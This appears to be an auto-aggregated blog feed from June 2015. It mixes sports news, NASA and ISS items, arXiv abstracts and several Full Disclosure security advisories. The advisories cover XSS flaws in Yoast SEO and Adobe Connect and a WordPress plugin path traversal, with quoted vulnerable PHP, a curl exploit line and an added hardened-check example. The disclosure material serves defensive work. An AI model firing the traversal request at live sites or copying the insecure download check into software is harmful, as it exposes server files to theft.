
Saturday, June 13, 2015

Orioles Highlight: Manny Machado with HR and 4 RBI, Nolan Reimold 2-run HR and triple in team's 6th straight win (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] OpenBSD "sys_execve()" Executable Header Parsing Denial of Service Vulnerability

How to fix FIFA: Experts say agency needs outside reformer

RIO DE JANEIRO (AP) Sepp Blatter thinks FIFA can reform itself. Anti-corruption experts say an institution in that much trouble won't be able to clean itself up without an outsider.

from FOX Sports Digital http://ift.tt/1FSPmgN
via IFTTT

Argentina concedes late goal, draws Paraguay in Copa America

RANCAGUA, Chile (AP) Argentina conceded a last-minute equalizer to open its Copa America participation with a disappointing 2-2 draw with Paraguay on Saturday.

from FOX Sports Digital http://ift.tt/1G2ZP8y
via IFTTT

Faeroe Islands beat Greece again in Euro 2016 qualifying

FRANKFURT, Germany (AP) The Faeroe Islands proved the first time wasn't a fluke when it beat Greece again 2-1 in European Championship qualifying on Saturday.

from FOX Sports Digital http://ift.tt/1ec2hUp
via IFTTT

Uruguay defeats Jamaica 1-0 to open Copa America

ANTOFAGASTA, Chile (AP) Defending champion Uruguay defeated Jamaica 1-0 in their Copa America opener on Saturday.

from FOX Sports Digital http://ift.tt/1JQnBKK
via IFTTT

Orioles: SS Everth Cabrera released; hit just .208 with 4 RBIs, 22 K's in 29 games in first season with Baltimore (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ronaldo nets 3, Portugal beats Armenia 3-2 in Euro qualifier

YEREVAN, Armenia (AP) Cristiano Ronaldo's hat trick gave 10-man Portugal a 3-2 win at Armenia in a 2016 European Championship qualifier on Saturday.

from FOX Sports Digital http://ift.tt/1GEszLs
via IFTTT

Ireland shreds game programs over CEO's FIFA crisis comments

DUBLIN (AP) The Football Association of Ireland says it shredded the 18,000 programs for Saturday's Euro 2016 qualifier against Scotland because they contained comments about the FIFA crisis.

from FOX Sports Digital http://ift.tt/1ebrCxQ
via IFTTT

STEW on Twitter: "New York Times fund keeps donors anonymous http://t.co/M4pnO3F2ZQ (via ...

New York Times fund keeps donors anonymous http://politi.co/1GjnNjm (via @DylanByers) Cool with me, but...

from Google Alert - anonymous https://www.google.com/url?rct=j&sa=t&url=https://twitter.com/StewSays/status/609434948987187200&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNFWYV3eCpRqwtqO4TXsnw80fcA7Pw
via IFTTT

Goalkeeper Buffon leaves Italy's squad with injured knee

ROME (AP) Goalkeeper Gianluigi Buffon has left Italy's squad after injuring his right knee in a 1-1 draw at Croatia.

from FOX Sports Digital http://ift.tt/1ebdyUZ
via IFTTT

2 parties cleared for talks on taking over bankrupt Parma

PARMA, Italy (AP) Two parties have been cleared for talks to take over the bankrupt Italian club Parma.

from FOX Sports Digital http://ift.tt/1IaVykY
via IFTTT

Ghana investigates top soccer official over World Cup funds

ACCRA, Ghana (AP) Ghana has ordered an investigation into how the head of the country's soccer association spent $200,000 in government money meant to prepare for the 2014 World Cup.

from FOX Sports Digital http://ift.tt/1L6PwIk
via IFTTT

Speculations on Anonymous Materials

Speculations on Anonymous Materials. Group exhibition at Fridericianum, Kassel, 2013. Timur Si-Qin — Speculations on Anonymous Materials.

from Google Alert - anonymous http://ift.tt/1FRcYm7
via IFTTT

Americans held, Japan through to last 16 at Women's WCup

WINNIPEG, Manitoba (AP) Sweden held the United States to a scoreless draw at the Women's World Cup on Friday, providing a good result for the Swedes and their coach Pia Sundhage, who used to be in charge of the American team.

from FOX Sports Digital http://ift.tt/1GDzKn3
via IFTTT

The Medusa Nebula


Braided, serpentine filaments of glowing gas suggest this nebula's popular name, The Medusa Nebula. Also known as Abell 21, this Medusa is an old planetary nebula some 1,500 light-years away along the southern border of the constellation Gemini. Like its mythological namesake, the nebula is associated with a dramatic transformation. The planetary nebula phase represents a final stage in the evolution of low mass stars like the sun, as they transform themselves from red giants to hot white dwarf stars and in the process shrug off their outer layers. Ultraviolet radiation from the hot star powers the nebular glow. An unrelated, bright, foreground star is near center in this close-up, telescopic view, while the Medusa's transforming central star is actually the dimmer star below center and toward the right-hand part of the frame. The Medusa Nebula is estimated to be over 4 light-years across. via NASA http://ift.tt/1S9BC9h

US soccer defends Hope Solo decisions in letter to senator

WINNIPEG, Manitoba (AP) The head of the U.S. Soccer defended the federation's handling of goalkeeper Hope Solo's domestic assault case in a letter to U.S. Senator Richard Blumenthal on Friday night.

from FOX Sports Digital http://ift.tt/1cRCCie
via IFTTT

Friday, June 12, 2015

Orioles Highlight: Chris Davis with HR and 4 RBI in 11-3 rout of Yankees; 5th straight win, at .500 1st time since May 5 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

IT Security – Do it the hard or easy way!

Whether you are a one-stop-shop IT guy or a network admin on a large IT team you owe it to yourself to learn about Security Information and Event Management (SIEM) technology. Why? SIEM lets you correlate between events recorded in different logs for related systems. This is significant because attackers often exploit multiple vulnerabilities on separate but connected systems. For a


from The Hacker News http://ift.tt/1Bcq3JT
via IFTTT

Do You also want to Hack Facebook Account of your Girlfriend?

We at The Hacker News get a lot of requests via emails and messages from people who want to hack into someone else’s Facebook account or Gmail account or break into somebody’s network. However, 80 to 90 percent requests we receive every day are from people who want to hack into their girlfriend, boyfriend, wife, or husband’s Facebook account in order to read their private conversations and


from The Hacker News http://ift.tt/1B9407j
via IFTTT

[FD] Yoast Wordpress SEO Plugin <= 2.1.1 Stored, Authenticated XSS

============================================================
Info
============================================================
Affects: Yoast Wordpress SEO Plugin <= 2.1.1
Download URL: http://ift.tt/1dJeqvV
Advisory URL: http://ift.tt/1L6hfIZ
Acknowledgement: http://ift.tt/1dJeqvW

============================================================
Description
============================================================
The "snippet preview" functionality of the Yoast WordPress SEO plugin prior to version 2.2 was susceptible to cross-site scripting in the admin panel, related to the "metabox" functionality. This vulnerability appears to have been reported 2 years ago by someone named "badconker" (link: http://ift.tt/1L6hd3V), but the plugin author said that it had already been patched at the time. The issue can be triggered by entering arbitrary HTML into the post title field, such as in the example URL provided below.

============================================================
Vulnerable URL
============================================================
http://ift.tt/1GjR4KN

============================================================
Vulnerable Code
============================================================
    try {
        str = jQuery('').html(str).text();
        str = str.replace(/<\/?[^>]+>/gi, '');
        str = str.replace(/\[(.+?)\](.+?\[\/\\1\])?/g, '');
    } catch (e) {}

Link: http://ift.tt/1L6hfJ1

============================================================
Fix
============================================================
Updating to the latest version (2.2.1 at the time of this advisory) will fix this issue.

Source: Gmail -> IFTTT-> Blogger

Mexico-Bolivia ends scoreless at Copa America

VINA DEL MAR, Chile (AP) Mexico and Bolivia played a lackluster 0-0 draw Friday in the second match of the Copa America, the South American championship.

from FOX Sports Digital http://ift.tt/1IAKSPp
via IFTTT

Simon scores twice in 2-0 Australia win over Nigeria

WINNIPEG, Manitoba (AP) Kyah Simon scored twice to lead Australia to a 2-0 victory over Nigeria in a group stage match Friday at the Women's World Cup.

from FOX Sports Digital http://ift.tt/1HBwxDw
via IFTTT

I have a new follower on Twitter


Peter Meek
Currently a Level 4 FA Referee, Reading FC fan and loves Coldplay. These are the views of myself and myself only
Camberley

Following: 963 - Followers: 297

June 12, 2015 at 05:31PM via Twitter http://twitter.com/Ref_r_u_blind

Bale grabs winner, Wales beat Belgium 1-0 in Euro qualifying

CARDIFF, Wales (AP) Gareth Bale pounced on a defensive error to give Wales a 1-0 win over Belgium in European Championship qualifying on Friday, lifting his team atop Group B and within sight of a first major tournament since 1958.

from FOX Sports Digital http://ift.tt/1KLPjcj
via IFTTT

Wijnaldum, Narsingh score as Netherlands beats Latvia 2-0

RIGA, Latvia (AP) PSV Eindhoven teammates Georginio Wijnaldum and Luciano Narsingh scored second-half goals Friday as the Netherlands beat Latvia 2-0 in Riga to move closer to second place in its European Championship qualifying group.

from FOX Sports Digital http://ift.tt/1GCSyD6
via IFTTT

Swastika pattern depicted on pitch during Croatia vs. Italy

SPLIT, Croatia (AP) Croatia could face punishment by UEFA after a swastika pattern could be seen on the pitch for its European Championship qualifying match against Italy.

from FOX Sports Digital http://ift.tt/1QTbvAZ
via IFTTT

CAF signs new marketing deal with Sportfive until 2028

PARIS (AP) The African Football Confederation has extended its marketing and media rights deal with Sportfive for another 12 years, extending their partnership until 2028.

from FOX Sports Digital http://ift.tt/1FPxm7b
via IFTTT

Fantasy MLB: Yankees P Michael Pineda is 3-0 with 2.56 ERA, 50 K's in 6 starts vs. Orioles; 16 K's, W in last meeting (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Andre Breitenreiter hired as coach of Schalke

GELSENKIRCHEN, Germany (AP) Schalke says it has hired Andre Breitenreiter of relegated Paderborn as new coach.

from FOX Sports Digital http://ift.tt/1cQgHbh
via IFTTT

Defiant Warner to challenge extradition from Trinidad to US

PORT-OF-SPAIN, Trinidad (AP) A defiant Jack Warner is predicting a lengthy legal battle to extradite him from Trinidad and Tobago to the U.S. to face charges in the FIFA corruption case.

from FOX Sports Digital http://ift.tt/1FP3EPI
via IFTTT

CAS sets target for Serbia, Albania Euro 2016 case verdicts

LAUSANNE, Switzerland (AP) A court ruling for appeals filed by the Serbian and Albanian football federation against UEFA sanctions after their European Championship qualifier was abandoned is expected by July 10.

from FOX Sports Digital http://ift.tt/1IO9bMx
via IFTTT

I have a new follower on Twitter


Funny Photos
funniest photos from all over the world


Following: 11042 - Followers: 11998

June 12, 2015 at 10:40AM via Twitter http://twitter.com/PhotoFunKill

ISS Daily Summary Report – 6/11/15

41 Soyuz (41S) Undock/Landing: 41S undocked and landed today at approximately 8:44 CDT, bringing Terry Virts, Anton Shkaplerov and Samantha Cristoforetti back to Earth. The undock began 3-crew operations on the ISS until the arrival of 43S currently planned for late in July.

41S Return Sample Collections Transfer: Kelly collected saliva, buccal, urine, and blood for Twins Study, Biochemical Profile, CardioOx, Salivary Markers, and Microbiome. Cristoforetti collected ambient collections for Microbiome and Salivary Markers. The samples to be frozen were inserted into Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return on a future flight. The ambient samples were handed over to be packed in the Soyuz. Additionally, Cristoforetti packed the Stem Cell Differentiation (SCD) samples from MELFI into the SCD Experiment Pouches and transferred them to Shkaplerov for final packing in the Soyuz.

Today’s Planned Activities
All activities were completed unless otherwise noted.
TWIN – Saliva Sample Collection HRF Blood Draw and Stow Prep Morning Inspection TWIN – Saliva Sample Collection HRF – Sample MELFI Insertion HRF Urine Sample Collection TWIN – Urine Sample Collection HRF – Sample MELFI Insertion ТК 715 Return Cargo Ops / r/g 8970 Setup GoPro HERO3 camera in ТК 715 [СА] Closing window shutters 6,8,9,12,13,14 / r/g 6965 Data Prep for Return EHS – IV-TEPC Transfer Stem Cell Differentiation (SCD) – Container Retrieval from MELFI Separation of EDV (KOV) (Separate EDV (KOV) No.1106 to EDV (KOV) No.1104) for Elektron or EDV-SV Stem Cell Differentiation (SCD) – Experiment Container Packing for Return Personal Medication Stowage SALMARK – Questionnaire Completion SCD Transfer WRS – Recycle Tank Fill HRF Closeout Ops TWIN – Blood Collection TWIN – Blood collection operator JRNL – Journal Entry HRF – Blood collection operator HRF Blood Draw Photo of ТК 715 [СА] and items prior to undocking / r/g 8970 TWIN – Gathering and pre-packing blood samples for return SALMARK – Questionnaire Completion Soyuz 715 Loading Complete Report (S-band) / r/g 8970, 8650 RR-HABITAT-STOW Photography of the external surface of Soyuz 715 [СА] БО hatch cover to assess slot antenna r/g 0284 Downlink photo of the outer side of ТК 715 [СА] БО hatch/manhole cover / r/g 0284 Glacier 5 – Desiccant Pack Swap GLACIER5 Battery Changeout HRF Urine Sample Collection Comm Config for ТК 715 Undocking and Descent  r/g 8229 HRF – Sample MELFI Insertion Disconnecting TVS Camera КЛ-153 from МRM1 TVS / r/g 7144 Soyuz 715 Activation, Comm Check from Soyuz 715 via S/G2 / Ascent and Descent r/g 9020, 9045,9067 ISS HAM RADIO Power Down Health Maintenance System (HMS) – Food Frequency Questionnaire TWIN – Equipment Stowage Gathering and Connecting КСПЭ Equipment for Hatch Closure coverage from MRM1 with simultaneous recording to CF card in mpeg2 format via Ku-band Closing USOS Window Shutters Soyuz 715 – MRM1 Hatch Closure r/g 9067 TV coverage of ТК 715-MRM1 Hatch Closure ТК 715- MRM1 
hatch leak check / Ascent and Descent Downlink of TV coverage Hatch Closure data from MRM1 КСПЭ hardware Deactivation and Closing Applications on ЦП SSC ТК 715 ODF Ops; Undocking and Descent Ops HAP2 – Hardware Stowage Monitoring Soyuz 715 Undocking, photos of ТК docking assembly / r/g 9066 Video of ТК 715 Undocking and Departure from ISS / r/g 9065 SPRINT. System Setup [Deferred] Reconfigure MRM1-Soyuz PEV to CLOSED position ISTOCHNIK-M Preparation For Measurements. / r/g 9068 ISTOCHNIK-M. Activation of ТК 715 TLM Recording Mode. / r/g 9068 ISTOCHNIK-M Closeout Ops / r/g 9068 ТК 715 comm reconfig for nominal ops after landing

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
41S undock operations

Three-Day Look Ahead:
Friday, 06/12: Sprint VO2 ops, Radiation Dosimetry
Saturday, 06/13: Crew off duty, housekeeping
Sunday, 06/14: Crew off duty

QUICK ISS Status – Environmental Control Group:
Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): On
[СКВ] 2 – SM Air Conditioner System (“SKV2”): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Shutdown
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Standby
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/1HzqOOC
via IFTTT

Franck Ribery suffers setback with ankle injury

MUNICH (AP) Bayern Munich says winger Franck Ribery's ankle injury has failed to respond to conservative treatment and that his right foot has been immobilized.

from FOX Sports Digital http://ift.tt/1GiWW6T
via IFTTT

[FD] The token order of OpVectorTimesScalar and OpMatrixTimesScalar which generated in glslangValidator isn't consistent with SPEC

Hi,

According to SPIR-V spec, OpVectorTimesScalar's first source operand is vector and secondary is scalar, and OpMatrixTimesScalar's first source operand is matrix and secondary is scalar. But it seems the token order generated by glslangValidator isn't consistent with spec. It is better if you can update glslangValidator to match spec's behavior. Following is a simple sample, in case you need it.

Example:

GLSL source:

    #version 440
    in layout(location = 0) vec4 v0;
    in layout(location = 1) float s1;
    in layout(location = 2) mat4 m2;
    out layout(location = 2) mat4 om2;
    void main() {
        gl_Position = s1 * v0;
        om2 = s1 * m2;
    }

SPIR-V generated glslangValidator:

    ...
    4(main): 2 Function None 3
    5: Label
    20: 7(float) Load 19(s1)
    23: 8(fvec4) Load 22(v0)
    24: 8(fvec4) VectorTimesScalar 20 23 <== 20 is float and 23 is vector
    26: 25(ptr) AccessChain 15 17
    Store 26 24
    30: 7(float) Load 19(s1)
    33: 27 Load 32(m2)
    34: 27 MatrixTimesScalar 30 33 <== 30 is float and 33 is matrix
    Store 29(om2) 34
    Branch 6
    6: Label
    Return
    FunctionEnd

Best Regards
Qun

Source: Gmail -> IFTTT-> Blogger

Interpol suspends $22M FIFA project during corruption crisis

LYON, France (AP) Interpol has suspended its 10-year, 20 million euro ($22.4 million) partnership with FIFA while soccer's governing body is implicated in bribery allegations.

from FOX Sports Digital http://ift.tt/1KJMecR
via IFTTT

The 2015 Earth-Orbiting Heliophysics Fleet

There've been a few changes since the 2013 Earth-Orbiting Heliophysics Fleet. As of Spring of 2015, here's a tour of the NASA Near-Earth Heliophysics fleet, covering the space from near-Earth orbit out to the orbit of the Moon.

The satellite orbits are color coded for their observing program:
Magenta: TIM (Thermosphere, Ionosphere, Mesosphere) observations
Yellow: solar observations and imagery
Cyan: Geospace and magnetosphere
Violet: Heliospheric observations

Near-Earth Fleet:
Hinode: Observes the Sun in multiple wavelengths up to x-rays.
RHESSI: Observes the Sun in x-rays and gamma-rays.
TIMED: Studies the upper layers (40-110 miles up) of the Earth's atmosphere.
FAST: Measures particles and fields in regions where aurora form.
CINDI: Measures interactions of neutral and charged particles in the ionosphere.
SORCE: Monitors solar intensity across a broad range of the electromagnetic spectrum.
AIM: Images and measures noctilucent clouds.
Van Allen Probes: Two probes moving along the same orbit designed to study the impact of space weather on Earth's radiation belts.
TWINS: Two Wide-Angle Imaging Neutral-Atom Spectrometers (TWINS) are two probes observing the Earth with neutral atom imagers.
IRIS: Interface Region Imaging Spectrograph is designed to take high-resolution spectra and images of the region between the solar photosphere and solar atmosphere.

Geosynchronous Fleet:
SDO: Solar Dynamics Observatory keeps the Sun under continuous observation at 16 megapixel resolution.

Geospace Fleet:
Geotail: Conducts measurements of electrons and ions in the Earth's magnetotail.
Magnetospheric Multi-scale (MMS): This is a group of four satellites which fly in formation to measure how particles and fields in the magnetosphere vary in space and time.
THEMIS: This is a fleet of three satellites to study how magnetospheric instabilities produce substorms. Two of the original five satellites were moved into lunar orbit to become ARTEMIS.
IBEX: The Interstellar Boundary Explorer measures the flux of neutral atoms from the heliopause.

Lunar Orbiting Fleet:
ARTEMIS: Two of the THEMIS satellites were moved into lunar orbit to study the interaction of the Earth's magnetosphere with the Moon.

Major changes with earlier versions:
MMS added
GOES satellites removed
Cluster satellites removed
Camera moves around the night-side of Earth.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1IMvWR0
via IFTTT

Norway draws top-ranked Germany 1-1 at Women's WCup

OTTAWA, Ontario (AP) Norway's Maren Mjelde scored from a free kick in the second half to secure a fortunate 1-1 draw against Germany in Thursday's clash of former champions at the Women's World Cup.

from FOX Sports Digital http://ift.tt/1QQDBg9
via IFTTT

The Light, the Dark, and the Dusty


This colorful skyscape spans about three full moons (1.5 degrees) across nebula rich starfields along the plane of our Milky Way Galaxy in the royal northern constellation Cepheus. Near the edge of the region's massive molecular cloud some 2,400 light-years away, bright reddish emission region Sharpless (Sh) 155 lies at the upper left, also known as the Cave Nebula. About 10 light-years across the cosmic cave's bright rims of gas are ionized by ultraviolet light from hot young stars. Dusty blue reflection nebulae also abound on the interstellar canvas cut by dense obscuring clouds of dust. The long core of the Lynds Dark Nebula (LDN) 1210 anchors the scene at lower right. Astronomical explorations have revealed other dramatic signs of star formation, including the bright red fleck of Herbig-Haro (HH) 168. Directly below the bright Cave Nebula, the Herbig-Haro object emission is generated by energetic jets from a newborn star. via NASA http://ift.tt/1KrqKkE

Thursday, June 11, 2015

Orioles Highlight: Adam Jones, Nolan Reimold and Manny Machado HR in 6-5 win over Red Sox; 1st series sweep of season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Host Chile beats Ecuador 2-0 in Copa America opener

SANTIAGO, Chile (AP) Arturo Vidal and Eduardo Vargas scored second-half goals to give Chile a 2-0 win over Ecuador on Thursday in the opening match of the Copa America, the South American championship that got under way amid the corruption investigation involving local football officials.

from FOX Sports Digital http://ift.tt/1JNxpFq
via IFTTT

Brazilian football confederation introduces term limits

SAO PAULO (AP) The Brazilian football confederation has introduced term limits for its presidents, keeping them from being in power for more than eight consecutive years.

from FOX Sports Digital http://ift.tt/1e7drtQ
via IFTTT

I keep 200+ Browser Tabs Open, and My Computer Runs Absolutely Fine. Here’s My Secret.

I don't know about your part, but I make heavy use of tabs. I currently have 200+ tabs open in my Google Chrome Web browser. And sometimes the number is even more. For me it's a daily thing, as I regularly open new tabs because of my habit of reading lots of stuff online, including cyber security updates, hacking news, knowledgeable articles of various categories, new recipes to cook


from The Hacker News http://ift.tt/1JJ5UOT
via IFTTT

MA Book of Meditations

This project is an exciting way to be of service to Marijuana Anonymous, as well as an unique opportunity for you to leave a lasting legacy to our ...

from Google Alert - anonymous http://ift.tt/1B6yLtq
via IFTTT

Cavani apologizes for saying Jamaica is an African team

ANTOFAGASTA, Chile (AP) Uruguay striker Edinson Cavani has apologized for calling Jamaica an African team.

from FOX Sports Digital http://ift.tt/1QswiAt
via IFTTT

Bayesian Poisson Tensor Factorization for Inferring Multilateral Relations from Sparse Dyadic Event Counts. (arXiv:1506.03493v1 [stat.ML])

We present a Bayesian tensor factorization model for inferring latent group structures from dynamic pairwise interaction patterns. For decades, political scientists have collected and analyzed records of the form "country $i$ took action $a$ toward country $j$ at time $t$"---known as dyadic events---in order to form and test theories of international relations. We represent these event data as a tensor of counts and develop Bayesian Poisson tensor factorization to infer a low-dimensional, interpretable representation of their salient patterns. We demonstrate that our model's predictive performance is better than that of standard non-negative tensor factorization methods. We also provide a comparison of our variational updates to their maximum likelihood counterparts. In doing so, we identify a better way to form point estimates of the latent factors than that typically used in Bayesian Poisson matrix factorization. Finally, we showcase our model as an exploratory analysis tool for political scientists. We show that the inferred latent factor matrices capture interpretable multilateral relations that both conform to and inform our knowledge of international affairs.



from cs.AI updates on arXiv.org http://ift.tt/1QsvxHF
via IFTTT

Bootstrapping Skills. (arXiv:1506.03624v1 [cs.AI])

The monolithic approach to policy representation in Markov Decision Processes (MDPs) looks for a single policy that can be represented as a function from states to actions. For the monolithic approach to succeed (and this is not always possible), a complex feature representation is often necessary since the policy is a complex object that has to prescribe what actions to take all over the state space. This is especially true in large domains with complicated dynamics. It is also computationally inefficient to both learn and plan in MDPs using a complex monolithic approach. We present a different approach where we restrict the policy space to policies that can be represented as combinations of simpler, parameterized skills---a type of temporally extended action, with a simple policy representation. We introduce Learning Skills via Bootstrapping (LSB) that can use a broad family of Reinforcement Learning (RL) algorithms as a "black box" to iteratively learn parametrized skills. Initially, the learned skills are short-sighted but each iteration of the algorithm allows the skills to bootstrap off one another, improving each skill in the process. We prove that this bootstrapping process returns a near-optimal policy. Furthermore, our experiments demonstrate that LSB can solve MDPs that, given the same representational power, could not be solved by a monolithic approach. Thus, planning with learned skills results in better policies without requiring complex policy representations.



from cs.AI updates on arXiv.org http://ift.tt/1Fcd0DB
via IFTTT

Long-term causal effects of interventions in multiagent economic mechanisms. (arXiv:1501.02315v3 [stat.ME] UPDATED)

The effect of an intervention in an economic mechanism, for example an increase in the reserve price of an auction, is causal if the observed effect is better than the counterfactual, i.e., the effect that would be observed under no intervention. As mechanisms are populated by dynamical systems of interacting agents, their response to an intervention fluctuates until the system reaches a new equilibrium. Effects measured in the new equilibrium, the long-term causal effects, are more representative of the value of interventions. However, the statistical estimation of long-term causal effects is difficult because it has to rely, for practical reasons, on data observed before the new equilibrium is reached. Furthermore, agent actions do not only depend on the mechanism that the agents are situated in but also on the behavior of others, which complicates the causal evaluation. In this paper, we formalize this problem of estimating long-term causal effects under the potential outcomes framework of causal inference \cite{neyman1923, rubin74}. We develop an estimation method that relies on a data augmentation strategy, where agents are assumed to adopt, at each timepoint, a behavior that is latent. This allows us to leverage existing work in behavioral game theory and time-series analysis of compositional data. Our method identifies the long-term causal effects under a set of assumptions that we formulate explicitly. We illustrate our method on a dataset from a real-world behavioral experiment, and discuss open problems to stimulate future research.



from cs.AI updates on arXiv.org http://ift.tt/1AK82il
via IFTTT

Vatican suspends deal with CONMEBOL amid investigation

BUENOS AIRES, Argentina (AP) The Vatican has suspended an agreement with the South American football confederation because of the corruption allegations against local officials.

from FOX Sports Digital http://ift.tt/1JIZyio
via IFTTT

I've generated a matlab anonymous function. I get errors on calling it

syms ax ay az bx by bz k double a=[ax ay az]' au=a./sqrt(ax^2+ay^2+az^2) b=[bx by bz]' bu=b./sqrt(bx^2+by^2+bz^2) R=[bu(1)*au(1) bu(1)*au(2) ...

from Google Alert - anonymous http://ift.tt/1I7JaC4
via IFTTT

Safe Helpline Rectangular Web Banner - "Anonymous"

Safe Helpline Rectangular Web Banner - "Anonymous". Incorporate Safe Helpline directly into your website! Many Service members bookmark the ...

from Google Alert - anonymous http://ift.tt/1QsnE53
via IFTTT

I have a new follower on Twitter


SQL Professionals
A Microsoft SQL Server Consultancy
Minneapolis, MN
http://t.co/3NEdo4HL4M
Following: 4563 - Followers: 4711

June 11, 2015 at 06:29PM via Twitter http://twitter.com/sqlpros

[FD] XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343)

Advisory: Adobe Connect Reflected XSS
Author: Stas Volfus (Bugsec Information Security LTD)
Vendor URL: http://www.adobe.com/
Status: Vendor Notified

==========================
Vulnerability Description
==========================
Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS (Cross Site Scripting). The attack allows execution of arbitrary JavaScript in the context of the user’s browser. CVE id: CVE-2015-0343 assigned for this issue.

==========================
PoC
==========================
The following URL demonstrates the vulnerability: http://ift.tt/1S8MowCXSS Link

==========================
Disclosure Timeline
==========================
04-NOV-2014 - Vendor notified
01-DEC-2014 - CVE assigned
27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4.

==========================
References
==========================
http://ift.tt/1GwLBS3
http://ift.tt/1S8Mp3v

Source: Gmail -> IFTTT-> Blogger

[FD] D-Link DSP-W110 - multiple vulnerabilities

>> D-Link DSP-W110 - multiple vulnerabilities -

Source: Gmail -> IFTTT-> Blogger

Fabregas leads Spain's 2-1 win over Costa Rica in friendly

LEON, Spain (AP) Cesc Fabregas scored one goal and set up another to lead Spain's 2-1 comeback win over Costa Rica in a friendly on Thursday.

from FOX Sports Digital http://ift.tt/1FMR0R4
via IFTTT

[FD] Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0

Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://ift.tt/1B7cBai
Download Site: http://ift.tt/1lcs4d8
Vendor: http://ift.tt/1B7cBak
Vendor Notified: 2015-06-06
Vendor Contact: http://ift.tt/1B7cBak

Description: An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.

Vulnerability: The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path; it only attempts to check if the path is in /wp-content/uploads, which is easily defeated with ../. This vulnerability doesn’t require authentication to the Wordpress site.

File ./se-html5-album-audio-player/download_audio.php:

    $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
    $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
    // make sure it's a file before doing anything!
    if( is_file($file_name) && $is_in_uploads_dir !== false ) {

        // required for IE
        if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }

        // get the file mime type using the file extension
        switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
            case 'pdf': $mime = 'application/pdf'; break;
            case 'zip': $mime = 'application/zip'; break;
            case 'jpeg':
            case 'jpg': $mime = 'image/jpg'; break;
            default: $mime = 'application/force-download';
        }
        header('Pragma: public'); // required
        header('Expires: 0'); // no cache
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
        header('Cache-Control: private',false);
        header('Content-Type: '.$mime);
        header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
        header('Content-Transfer-Encoding: binary');
        header('Content-Length: '.filesize($file_name)); // provide file size
        header('Connection: close');
        readfile($file_name); // push it out
        exit();
    }

The above code does not verify if a user is logged in, and does not do proper sanity checking if the file is outside of the uploads directory.

CVEID: 2015-4414
OSVDB:
Exploit Code:
• $ curl http://ift.tt/1Qs7Eje

Source: Gmail -> IFTTT-> Blogger
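The path check described in the se-html5-album-audio-player advisory above, next to a canonicalising replacement. This is an added example, not code from the plugin or its vendor; the function names and the temporary directory tree are constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// The plugin's decision, isolated: a substring test on the raw, unresolved path.
function weak_is_allowed(string $docRoot, string $requested): bool
{
    $file = $docRoot . $requested;
    return is_file($file) && strpos($file, '/wp-content/uploads/') !== false;
}

// Hardened decision (hypothetical helper): resolve the path first, then require
// the resolved file to sit underneath the resolved uploads directory.
// Returns the canonical path to serve, or null when the request must be refused.
function resolve_upload(string $docRoot, string $requested): ?string
{
    $base = realpath($docRoot . '/wp-content/uploads');
    $real = realpath($docRoot . $requested); // collapses ../ and follows symlinks
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    // Compare against "base/" so a sibling such as "uploads-private" cannot match.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed fixture: a throwaway document root with one upload and two
// files outside uploads that must never be served.
$root = sys_get_temp_dir() . '/docroot_' . bin2hex(random_bytes(4));
mkdir($root . '/wp-content/uploads/album', 0700, true);
mkdir($root . '/wp-content/uploads-private', 0700, true);
file_put_contents($root . '/wp-content/uploads/album/track.mp3', 'audio');
file_put_contents($root . '/wp-content/uploads-private/notes.txt', 'private');
file_put_contents($root . '/wp-config.php', 'secret');

$requests = [
    '/wp-content/uploads/album/track.mp3',     // legitimate upload
    '/wp-content/uploads/../../wp-config.php', // contains the marker, resolves outside
    '/wp-content/uploads-private/notes.txt',   // sibling directory sharing the name prefix
    '/wp-content/uploads/album/missing.mp3',   // no such file
];
foreach ($requests as $r) {
    printf("%-42s weak=%-5s hardened=%s\n", $r,
        var_export(weak_is_allowed($root, $r), true),
        resolve_upload($root, $r) === null ? 'refused' : 'served');
}

// Remove the fixture.
foreach (['/wp-content/uploads/album/track.mp3',
          '/wp-content/uploads-private/notes.txt',
          '/wp-config.php'] as $f) {
    unlink($root . $f);
}
foreach (['/wp-content/uploads/album', '/wp-content/uploads',
          '/wp-content/uploads-private', '/wp-content', ''] as $d) {
    rmdir($root . $d);
}
```

A download script built on this would pass only the returned canonical path to readfile(), and would still need the login check the advisory notes is missing.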

